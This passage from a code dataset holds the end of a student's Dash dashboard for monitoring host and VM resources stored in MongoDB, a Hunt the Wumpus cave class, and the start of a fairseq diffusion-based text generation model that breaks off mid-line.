style={'backgroundColor': '#263240', 'padding': '10px'}),\r\n html.Div([\r\n html.Div([\r\n html.Form([\r\n html.H3('Server settings', style={'color': '#0000000', 'text-align': 'center'}),\r\n html.Div([\r\n html.H6('Server address', style={'color': '#0000000'}),\r\n dcc.Input(value='', type='text', className=\"eleven columns\"),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.H6('Username', style={'color': '#0000000'}),\r\n dcc.Input(value='', type='text', className=\"eleven columns\",\r\n style={}),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.H6('Password', style={'color': '#0000000'}),\r\n dcc.Input(value='', type='password', className=\"eleven columns\",\r\n style={\"padding\": \"20px\"}),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.Button('Submit', id='button',\r\n style={'color': '#FFFFFF', 'backgroundColor': '#111111'}, className=\"twelve columns\")\r\n ], className='row', style={'padding':'20px'})\r\n\r\n ])\r\n ], className=\"four columns\", style={'backgroundColor': '#e8f4f7', 'padding': '10px', 'padding-bottom':'10px','text-align': 'center'})\r\n ], className='row'),\r\n html.Div([\r\n\r\n ],className=\"row\", style={'backgroundColor':'#263240'})\r\n],className=\"row\", style={'backgroundColor':'#263240'})\r\n\r\n# Interactive pages\r\n@app.callback(Output('tabs-content', 'children'),\r\n [Input('tabs', 'value')])\r\ndef render_content(tab):\r\n # List of date times for graphs\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n minus5 = timedelta(minutes=-5)\r\n now_minus_5 = datetime.now() + minus5\r\n current_time_minus_5 = now_minus_5.strftime(\"%H:%M\")\r\n now_minus_10 = datetime.now() + minus5*2\r\n current_time_minus_10 = now_minus_10.strftime(\"%H:%M\")\r\n now_minus_15 = datetime.now() + minus5*3\r\n current_time_minus_15 = now_minus_15.strftime(\"%H:%M\")\r\n now_minus_20 = datetime.now() + minus5*4\r\n current_time_minus_20 = now_minus_20.strftime(\"%H:%M\")\r\n now_minus_25 = datetime.now() + minus5*5\r\n current_time_minus_25 = now_minus_25.strftime(\"%H:%M\")\r\n now_minus_30 = datetime.now() + minus5*6\r\n current_time_minus_30 = now_minus_30.strftime(\"%H:%M\")\r\n\r\n # System information dashboard\r\n if tab == 'system':\r\n return html.Div([\r\n html.Div([\r\n html.H3(children='Resources', style={\r\n 'textAlign': 'center',\r\n 'color': '#ffffff',\r\n 'backgroundColor':'#52687a',\r\n 'padding': '10px'}),\r\n\r\n # Graphs of CPU, RAM and Storage\r\n html.Div([\r\n html.Div([\r\n\r\n dcc.Graph(id='live-update-graph',\r\n figure=dict(\r\n data=[\r\n dict(\r\n x=[current_time_minus_30, current_time_minus_25, current_time_minus_20,\r\n current_time_minus_15, current_time_minus_10, current_time_minus_5,\r\n current_time],\r\n y=[ 90, 92, 93, 93, 92, 91, 94],\r\n name=\"CPU\",\r\n marker=dict(\r\n color='rgb(55, 83, 109)'\r\n )\r\n )\r\n ],\r\n layout=dict(\r\n plot_bgcolor='#E8F4F7',\r\n paper_bgcolor='#E8F4F7',\r\n textfont= dict(color='#ffffff'),\r\n title='CPU usage %',\r\n height=400,\r\n showlegend=True,\r\n\r\n legend=dict(\r\n x=0,\r\n y=1.0\r\n ),\r\n margin=dict(l=40, r=0, t=40, b=30)\r\n ),\r\n ),\r\n )\r\n\r\n ],className=\"four columns\", style={'backgroundColor':'#263240', 'padding': '10px'}),\r\n\r\n html.Div([\r\n dcc.Graph(\r\n figure=dict(\r\n data=[\r\n dict(\r\n x=[current_time_minus_30, current_time_minus_25, current_time_minus_20,\r\n current_time_minus_15, current_time_minus_10, current_time_minus_5,\r\n current_time],\r\n y=[64, 64, 64, 65,\r\n 62, 60],\r\n name='RAM',\r\n marker=dict(\r\n color='rgb(26, 
118, 255)'\r\n )\r\n )\r\n\r\n ],\r\n layout=dict(\r\n title='RAM usage %',\r\n showlegend=True,\r\n plot_bgcolor='#E8F4F7',\r\n paper_bgcolor='#E8F4F7',\r\n height = 400,\r\n legend=dict(\r\n x=0,\r\n y=1.0\r\n ),\r\n margin=dict(l=40, r=0, t=40, b=30)\r\n ),\r\n ),\r\n )\r\n\r\n ], className=\"four columns\", style={'backgroundColor':'#263240', 'padding': '10px'}),\r\n html.Div([\r\n dcc.Graph(\r\n figure=dict(\r\n data=[\r\n dict(\r\n x=[current_time_minus_30, current_time_minus_25, current_time_minus_20,\r\n current_time_minus_15, current_time_minus_10, current_time_minus_5,\r\n current_time],\r\n y=[56, 56, 56, 56,\r\n 56, 56,],\r\n name='Storage',\r\n marker=dict(\r\n color='rgb(2, 168, 25)'\r\n )\r\n )\r\n ],\r\n layout=dict(\r\n title='Disk usage %',\r\n height=400,\r\n showlegend=True,\r\n plot_bgcolor='#E8F4F7',\r\n paper_bgcolor='#E8F4F7',\r\n legend=dict(\r\n x=0,\r\n y=1.0\r\n ),\r\n margin=dict(l=40, r=0, t=40, b=30)\r\n ),\r\n ),\r\n )\r\n\r\n ], className=\"four columns\", style={'backgroundColor':'#263240', 'padding': '10px'})\r\n ]),\r\n\r\n\r\n ], className=\"row\", style={'backgroundColor':'#263240', 'bottom': '100px'}),\r\n # Detailed information on system\r\n html.Div([\r\n html.H6('CPU Cores: '+ str(cpu_cores())),\r\n html.H6('CPU Threads: '+ str(cpu_threads())),\r\n html.H6('CPU Sockets: '+ str(cpu_sockets())),\r\n html.H6('CPU Model: '+ str(cpu_model())),\r\n html.H6('Memory: '+ str(memory_size())+ \" GB\"),\r\n html.H6('Total Storage: ' + str(total_storage()) + \" GB\"),\r\n html.H6('Vendor: '+ str(vendor())),\r\n html.H6('Model: '+ str(model())),\r\n html.H6('Server IP: '+ str(server_IP())),\r\n html.H6('vCenter IP: '+ str(vcenter_IP())),\r\n html.H6('No. Network Interfaces: '+ str(network_interfaces()))\r\n\r\n ], style={'backgroundColor': '#e8f4f7'}),\r\n ])\r\n\r\n# Virtual machine informaion dashboard\r\n elif tab == 'virtual-machine':\r\n\r\n return html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(children='Virtual Machines', style={\r\n 'textAlign': 'center',\r\n 'color': '#ffffff',\r\n 'backgroundColor': '#3d4e5c',\r\n 'padding': '20px'}),\r\n ], className= 'row', style={'backgroundColor': '#111111'}),\r\n\r\n # Virtual machine information boxes\r\n html.Div([\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 0)/1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 0)/(2**30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 0)/(2**30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + 
str(virtualMachines('power_state', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 1) / 1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 1) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage' , 1) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n ], className= 'row',style={'backgroundColor': '#111111'}),\r\n\r\n html.Div([\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 2) / 1024, 1)) + \"GB\",\r\n style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(\r\n round(virtualMachines('host_storage_assigned', 2) / (2 ** 30), 2)) + \"GB\",\r\n style={'color': '#FFFFFF'}),\r\n html.H6(\r\n \"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 2) / (2 ** 30), 2)) + \"GB\",\r\n style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 3) / 1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 3) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 3) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n ], className='row', style={'backgroundColor': '#111111', 'padding': '10px'}),\r\n\r\n html.Div([\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 4) / 1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 
4) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n                    html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 4) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n                ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n            ], className='row', style={'backgroundColor': '#111111', 'padding': '10px'}),\r\n        ], className=\"twelve columns\", style={'backgroundColor': '#111111',}),\r\n        ],style={'backgroundColor': '#263240'}),\r\n        html.Div([\r\n            html.H3('vm', style={'color': '#FFFFFF', 'text-align': 'center'}),\r\n        ],style={'backgroundColor': '#263240', 'padding': '50px'})\r\n\r\n    # Virtual machine deployment page\r\n    elif tab == 'Deploy':\r\n        return html.Div([\r\n            html.Div([\r\n                # Deployment form\r\n                html.Form([\r\n                    html.H3('Deploy VM', style={'color': '#FFFFFF', 'text-align': 'center'}),\r\n                    html.Div([\r\n                        html.H6('VM Name', style={'color': '#FFFFFF'}),\r\n                        dcc.Input(value='', type='text', className=\"ten columns\"),\r\n                    ], className=\"row\"),\r\n                    html.Div([\r\n                        html.H6('Description', style={'color': '#FFFFFF'}),\r\n                        dcc.Input(value='', type='text', className=\"ten columns\", style={'backgroundColor': '#3d4e5c', \"padding\": \"20px\"}),\r\n                    ], className=\"row\"),\r\n                    html.H6('RAM', style={'color': '#FFFFFF'}),\r\n                    # Auto adjusting slider\r\n                    dcc.Slider(\r\n                        min=0,\r\n                        max=round(avaliable_resources('memory')),\r\n                        marks={i: '1'.format(i) if i == 1 else str(i) for i in range(1, 32)},\r\n                        value=1,\r\n                    ),\r\n                    html.H6('CPU Cores', style={'color': '#FFFFFF'}),\r\n                    dcc.Slider(\r\n                        min=0,\r\n                        max=24,\r\n                        marks={i: '1'.format(i) if i == 1 else str(i) for i in range(1, 24)},\r\n                        value=1,\r\n                    ),\r\n                    html.Div([\r\n                        html.H6('OS Type', style={'color': '#FFFFFF'}),\r\n                        html.Div([\r\n                            dcc.Dropdown(\r\n                                options=[\r\n                                    {'label': 'Windows', 'value': 'Windows'},\r\n                                    {'label': 'Linux', 'value': 'Linux'},\r\n                                    {'label': 'Other', 'value': 'Other'}\r\n                                ],\r\n                                value=''\r\n                            ),\r\n                        ], className=\"ten columns\"),\r\n                    ], className=\"row\"),\r\n                    html.H6('Disk size in GB', style={'color': '#FFFFFF'}),\r\n                    html.Div(dcc.Input(id='input-box', type='number'), className=\"ten columns\"),\r\n                    # Form submission button\r\n                    html.Div([\r\n                        html.Button('Submit', id='button',\r\n                                    style={'color': '#FFFFFF', 'backgroundColor': '#111111', \"float\": \"right\"}, className=\"five columns\")\r\n                    ], className=\"row\")\r\n                ])\r\n            ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n            # Live remaining resources\r\n            html.Div([\r\n                html.H3('Remaining Resources', style={'color': '#111111'}),\r\n                html.H5(\"RAM: \" + str(round(avaliable_resources('memory'), 2)) + \" GB remaining\"),\r\n                html.H5(\"Storage: \" + str(round(remaining_storage(), 2)) + \" GB remaining\"),\r\n            ], className=\"six columns\", style={'backgroundColor': '#e8f4f7', 'padding': '10px', 'text-align':'center'})\r\n        ], className='row')\r\n\r\n# Retrieve virtual machine information from database\r\ndef virtualMachines(appliance, id):\r\n    myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n    mydb = myclient[\"Virtual_Machines\"]\r\n    mycol = mydb[\"Machines\"]\r\n    try:\r\n        for vm in mycol.find({\"id\" : id}):\r\n            # print(vm)\r\n            results = vm\r\n            del results['_id']\r\n            vm_name = results[appliance]\r\n        return vm_name\r\n    except:\r\n        vm_name = '0'\r\n        return vm_name\r\n\r\n\r\n# Retrieve system information from database\r\ndef systemSpecs(value):\r\n    try:\r\n        component = []\r\n        myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n        mydb = 
myclient[\"System_Specs\"]\r\n mycol = mydb[\"Specs\"]\r\n\r\n results = mycol.find({\"_id\": 0})\r\n for info in results:\r\n info.pop('_id')\r\n for specs in info:\r\n component.append(info[specs])\r\n return str(component[value])\r\n except:\r\n return \"Failed to retrieve data\"\r\n\r\n\r\n# Select coresponding piece of hardware to retrieve from database\r\ndef cpu_cores():\r\n return systemSpecs(0)\r\n\r\n\r\ndef cpu_sockets():\r\n return systemSpecs(1)\r\n\r\n\r\ndef cpu_threads():\r\n return systemSpecs(2)\r\n\r\n\r\ndef cpu_mhz():\r\n return systemSpecs(3)\r\n\r\n\r\ndef cpu_model():\r\n return systemSpecs(4)\r\n\r\n\r\ndef memory_size():\r\n return round(float(systemSpecs(5)) / 2**30, 2)\r\n\r\n\r\ndef vendor():\r\n return systemSpecs(6)\r\n\r\n\r\ndef model():\r\n return systemSpecs(7)\r\n\r\n\r\ndef server_IP():\r\n return systemSpecs(8)\r\n\r\n\r\ndef vcenter_IP():\r\n return systemSpecs(9)\r\n\r\n\r\ndef network_interfaces():\r\n return systemSpecs(10)\r\n\r\n\r\ndef remaining_storage():\r\n return round(float(systemSpecs(11)) /2**30, 2)\r\n\r\n\r\ndef total_storage():\r\n return round(float(systemSpecs(12)) /2**30, 2)\r\n\r\n\r\n# Calaculate remaining resources of system\r\ndef avaliable_resources(value):\r\n vm_usage = float(get_data(10)) / 1024\r\n print(vm_usage)\r\n total_system_memory = float(systemSpecs(5)) / 1024**3\r\n print(total_system_memory )\r\n remaining = total_system_memory- vm_usage\r\n print(remaining)\r\n return remaining\r\n\r\n# Retrieve storage or memory usage\r\ndef get_data(value):\r\n try:\r\n component = []\r\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n mydb = myclient[\"Virtual_Machines\"]\r\n mycol = mydb[\"Machines\"]\r\n\r\n results = mycol.find({})\r\n for info in results:\r\n info.pop('_id')\r\n for specs in info:\r\n component.append(info[specs])\r\n return str(component[8])\r\n except:\r\n return 0\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(host=\"0.0.0.0\")\r\n","repo_name":"RyanStarr/Final-Year-Project","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":23552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10324282755","text":"class Cave:\n \"\"\"\n This class is for managing the state of individual cave rooms.\n It should contain connections to other cave rooms.\n \"\"\"\n\n def __init__(self, name):\n self.name = name\n self.connections = []\n self.pit = False\n self.bat = False\n self.wumpus = False\n\n def is_safe(self):\n return not (self.pit or self.bat or self.wumpus)\n\n def add_connection(self, cave):\n \"\"\"\n Connect this cave to another.\n The reverse connection is automatically created.\n \"\"\"\n\n if cave not in self.connections:\n self.connections.append(cave)\n if self not in cave.connections:\n cave.connections.append(self)\n\n def __str__(self):\n return self.name\n\n\nCAVE_NAMES = [\n \"Airy Alcove\", \"Bat-Filled Basement\", \"Charred Chasm\", \"Dank Dungeon\",\n \"Eerie Eyelet\", \"Frightening Fissure\", \"Ghastly Grotto\", \"Heated Hellhole\",\n \"Incendiary Interior\", \"Janky Jail\", \"Killer Karst\", \"Lame Lounge\",\n \"Meandering Mists\", \"Putrid Passage\", \"Sulfurous Sinkhole\", \"Terrible Tube\",\n \"Undulating Underground\", \"Vertical Vastness\", \"Nasty Nest\",\n \"Offal-Filled Opening\"\n]\n\nCAVE_CONNECTIONS = [[0, 1, 4, 5], [1, 7, 2], [2, 9, 3], [3, 11, 4], [4, 13],\n [5, 6, 14], [6, 7, 16], [7, 8], [8, 9, 17], [9, 10],\n [10, 11, 18], [11, 12], [12, 13, 19], 
[13, 14], [15, 16],\n [16, 17], [18, 19]]\n","repo_name":"momentum-cohort-2019-09/examples","sub_path":"w5d4--hunt-the-wumpus/cave.py","file_name":"cave.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18104771597","text":"from random import random\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom fairseq import utils\nfrom fairseq.models import register_model, register_model_architecture, transformer\nfrom fairseq.models.nat import NATransformerModel\nfrom fairseq.modules.transformer_sentence_encoder import init_bert_params\n\nfrom improved_diffusion.gaussian_diffusion import GaussianDiffusion\nfrom improved_diffusion.respace import SpacedDiffusion, space_timesteps\n\nfrom .modules import DifformerEncoder, DifformerDecoder\nfrom .utils import get_named_beta_schedule\n\n\n@register_model(\"difformer\")\nclass Difformer(NATransformerModel):\n @staticmethod\n def add_args(parser):\n NATransformerModel.add_args(parser)\n\n parser.add_argument(\n \"--model-dim\",\n type=int, metavar=\"N\",\n help=\"The dimension of the model\"\n )\n parser.add_argument(\n \"--latent-dim\",\n type=int, metavar=\"N\",\n help=\"The dimension of $z_t$\"\n )\n\n parser.add_argument(\n \"--share-project-in-dim\",\n action=\"store_true\",\n help=\"Share projection layers of the encoder and decoder\"\n )\n\n parser.add_argument(\n \"--diffusion-steps\",\n type=int, metavar=\"N\", default=2000,\n help=\"Diffusion steps\"\n )\n\n parser.add_argument(\n \"--noise-schedule\",\n type=str, metavar=\"STR\", default=\"sqrt\",\n help=\"The noise schedule during training\"\n )\n parser.add_argument(\n \"--noise-factor\",\n type=float, metavar=\"D\", default=1.0,\n help=\"The noise factor during training\"\n )\n parser.add_argument(\n \"--rescale-factor\",\n type=float, metavar=\"D\", default=1.0,\n help=\"When change the noise factor, both the signal-to-noise ratio (SNR) of the \\\n noise schedule and the variance of $z_t$ are changed. 
The rescale factor only \\\n rescales the noise schedule, so that it has a equivalent SNR, but keeps the \\\n variance of $z_t$ unchanged.\"\n )\n\n parser.add_argument(\n \"--embed-norm\",\n action=\"store_true\",\n help=\"Add embedding layer normalization\"\n )\n parser.add_argument(\n \"--embed-norm-affine\",\n action=\"store_true\",\n help=\"Add elementwise affine parameters to the embedding layer normalization\"\n )\n parser.add_argument(\n \"--embed-norm-before-proj\",\n action=\"store_true\",\n help=\"Put the embedding layer normalization before the projection layers\"\n )\n\n parser.add_argument(\n \"--self-cond\",\n action=\"store_true\",\n help=\"Self-conditioning\"\n )\n parser.add_argument(\n \"--self-cond-before-proj\",\n action=\"store_true\",\n help=\"Concatenate self-conditioning embeddings before the projection layers\"\n )\n\n parser.add_argument(\n \"--rounding-loss\",\n action=\"store_true\",\n help=\"Use the rounding loss instead of the anchor loss\"\n )\n\n parser.add_argument(\n \"--rescale-timesteps\",\n action=\"store_true\",\n help=\"Pass floating point timesteps into the model\"\n )\n\n def __init__(self, args, encoder, decoder):\n super().__init__(args, encoder, decoder)\n\n self.training_diffusion = GaussianDiffusion(\n betas=get_named_beta_schedule(\n args.noise_schedule,\n args.diffusion_steps,\n args.rescale_factor\n ),\n model_mean_type=None, model_var_type=None, loss_type=None\n )\n\n # so we have different schedules in training and decoding\n self.decoding_diffusion = SpacedDiffusion(\n space_timesteps(args.diffusion_steps, str(args.decoding_steps)),\n betas=get_named_beta_schedule(\n args.noise_schedule,\n args.diffusion_steps,\n args.decoding_rescale_factor\n ),\n model_mean_type=None, model_var_type=None, loss_type=None\n )\n\n self.timesteps_scale = (1000.0 / args.diffusion_steps) if args.rescale_timesteps else 1.0\n \n @classmethod\n def build_encoder(cls, args, src_dict, embed_tokens, project_in_dim):\n return DifformerEncoder(args, src_dict, embed_tokens, project_in_dim)\n\n @classmethod\n def build_decoder(cls, args, tgt_dict, embed_tokens, project_in_dim, project_out_dim):\n decoder = DifformerDecoder(args, tgt_dict, embed_tokens, project_in_dim, project_out_dim)\n if getattr(args, \"apply_bert_init\", False):\n decoder.apply(init_bert_params)\n return decoder\n\n @classmethod\n def build_model(cls, args, task):\n \"\"\" Build a new model instance \"\"\"\n\n transformer.base_architecture(args)\n base_architecture(args)\n\n if args.encoder_layers_to_keep:\n args.encoder_layers = len(args.encoder_layers_to_keep.split(\",\"))\n if args.decoder_layers_to_keep:\n args.decoder_layers = len(args.decoder_layers_to_keep.split(\",\"))\n\n if getattr(args, \"max_source_positions\", None) is None:\n args.max_source_positions = transformer.DEFAULT_MAX_SOURCE_POSITIONS\n if getattr(args, \"max_target_positions\", None) is None:\n args.max_target_positions = transformer.DEFAULT_MAX_TARGET_POSITIONS\n\n src_dict, tgt_dict = task.source_dictionary, task.target_dictionary\n latent_dim = args.latent_dim\n model_dim = args.model_dim\n\n if args.share_all_embeddings:\n if src_dict != tgt_dict:\n raise ValueError(\"--share-all-embeddings requires a joined dictionary\")\n if args.encoder_embed_dim != args.decoder_embed_dim:\n raise ValueError(\n \"--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim\"\n )\n if args.decoder_embed_path and (\n args.decoder_embed_path != args.encoder_embed_path\n ):\n raise ValueError(\n 
\"--share-all-embeddings not compatible with --decoder-embed-path\"\n )\n encoder_embed_tokens = cls.build_embedding(\n args, src_dict, latent_dim, args.encoder_embed_path\n )\n decoder_embed_tokens = encoder_embed_tokens\n args.share_decoder_input_output_embed = True\n \n else:\n encoder_embed_tokens = cls.build_embedding(\n args, src_dict, latent_dim, args.encoder_embed_path\n )\n decoder_embed_tokens = cls.build_embedding(\n args, tgt_dict, latent_dim, args.encoder_embed_path\n )\n\n # projection layers\n if latent_dim != model_dim:\n encoder_project_in_dim = nn.Linear(latent_dim, model_dim, bias=False)\n decoder_project_in_dim = (\n encoder_project_in_dim if args.share_project_in_dim\n else nn.Linear(latent_dim, model_dim, bias=False)\n )\n \n decoder_project_out_dim = nn.Linear(model_dim, latent_dim, bias=False)\n \n else:\n encoder_project_in_dim = nn.Identity()\n decoder_project_in_dim = nn.Identity()\n decoder_project_out_dim = nn.Identity()\n\n encoder = cls.build_encoder(args, src_dict, encoder_embed_tokens, encoder_project_in_dim)\n decoder = cls.build_decoder(\n args, tgt_dict, decoder_embed_tokens,\n decoder_project_in_dim, decoder_project_out_dim\n )\n\n return cls(args, encoder, decoder)\n\n def forward(self, src_tokens, src_lengths, _, tgt_tokens, **kwargs):\n \"\"\" Compute training losses \"\"\"\n\n # encoding\n encoder_out = self.encoder(src_tokens, src_lengths=src_lengths)\n\n # length prediction\n length_out = self.decoder.forward_length(normalize=False, encoder_out=encoder_out)\n length_tgt = self.decoder.forward_length_prediction(length_out, encoder_out, tgt_tokens)\n mask = tgt_tokens.ne(self.pad)\n\n # diffusion\n z_0 = self.decoder.forward_embedding(tgt_tokens)\n t = torch.randint(0, self.args.diffusion_steps, [len(z_0)], device=z_0.device)\n model_t = t * self.timesteps_scale\n\n noise = torch.randn_like(z_0) * self.args.noise_factor\n z_t = self.training_diffusion.q_sample(z_0, t, noise).type_as(z_0)\n\n # self-conditioning\n prev_z_0_hat = torch.zeros_like(z_0)\n if self.args.self_cond and random() < 0.5:\n with torch.no_grad():\n prev_z_0_hat = self.decoder(z_t, model_t, mask, encoder_out, prev_z_0_hat)[0]\n \n z_0_hat = self.decoder(z_t, model_t, mask, encoder_out, prev_z_0_hat)[0]\n logits = self.decoder.output_layer(z_0 if self.args.rounding_loss else z_0_hat)\n\n return {\n \"diffusion\": {\n \"loss\": (z_0_hat - z_0)[mask].square().mean()\n },\n\n \"word_ins\": {\n \"out\": logits,\n \"tgt\": tgt_tokens,\n \"mask\": mask,\n \"ls\": self.args.label_smoothing,\n \"nll_loss\": True,\n },\n \n \"length\": {\n \"out\": length_out,\n \"tgt\": length_tgt,\n \"factor\": self.decoder.length_loss_factor,\n },\n }\n\n def forward_decoder(self, z_t, step, mask, encoder_out, prev_z_0_hat=None, **kwargs):\n \"\"\" Sample z_{t-1} given z_t \"\"\"\n\n # rescale timesteps\n model_t = (\n self.decoding_diffusion.timestep_map[step]\n if self.args.decoding_fixed_t is None\n else self.args.decoding_fixed_t * self.args.diffusion_steps\n ) * self.timesteps_scale\n model_t = torch.full([len(z_t)], model_t, device=z_t.device)\n\n # predict z_0 \n z_0_hat = self.decoder(z_t, model_t, mask, encoder_out, prev_z_0_hat)[0]\n\n # clamping trick\n if self.args.clamping:\n tokens = self.decoder.output_layer(z_0_hat).argmax(-1)\n z_0_hat = self.decoder.forward_embedding(tokens)\n\n # sample z_{t-1}\n t = torch.tensor(step, device=z_t.device)\n mean, _, log_variance = self.decoding_diffusion.q_posterior_mean_variance(z_0_hat, z_t, t)\n noise = torch.randn_like(z_t) * 
self.args.decoding_noise_factor\n\n z_t = mean + (0.5 * log_variance).exp() * noise\n z_t = z_t.type_as(z_0_hat)\n\n return z_t, z_0_hat\n\n def forward_output_layer(self, z_t, mask):\n logits, tokens = self.decoder.output_layer(z_t).max(-1)\n scores = F.log_softmax(logits, -1)\n return tokens, scores, mask\n\n def initialize_z_t(self, encoder_out):\n \"\"\" Sample z_T \"\"\"\n # length prediction\n pred_length = self.decoder.forward_length_prediction(\n self.decoder.forward_length(normalize=True, encoder_out=encoder_out),\n encoder_out=encoder_out,\n )\n\n max_length = pred_length.clamp_(min=2).max()\n z_t = torch.randn(\n (len(pred_length), max_length, self.args.latent_dim),\n ) * self.args.decoding_noise_factor\n\n return z_t, pred_length\n\n def regenerate_beam(self, pred_length, length_beam_size, noise_beam_size):\n pred_length = (\n pred_length[:, None, None]\n + utils.new_arange(pred_length, 1, noise_beam_size, length_beam_size).transpose(-1, -2)\n - length_beam_size // 2\n ).flatten() # (bsz * length_beam_size * noise_beam_size)\n\n max_length = pred_length.clamp_(min=2).max()\n z_t = torch.randn(\n (len(pred_length), max_length, self.args.latent_dim),\n ) * self.args.decoding_noise_factor\n\n return z_t, pred_length\n\n\n@register_model_architecture(\"difformer\", \"difformer\")\ndef base_architecture(args):\n args.model_dim = getattr(args, \"model_dim\", 512)\n args.latent_dim = getattr(args, \"latent_dim\", 128)\n\n args.encoder_embed_path = getattr(args, \"encoder_embed_path\", None)\n args.encoder_embed_dim = args.model_dim\n args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 2048)\n args.encoder_layers = getattr(args, \"encoder_layers\", 6)\n args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 8)\n args.encoder_normalize_before = getattr(args, \"encoder_normalize_before\", False)\n args.encoder_learned_pos = getattr(args, \"encoder_learned_pos\", False)\n args.decoder_embed_path = getattr(args, \"decoder_embed_path\", None)\n args.decoder_embed_dim = args.model_dim\n args.decoder_ffn_embed_dim = getattr(\n 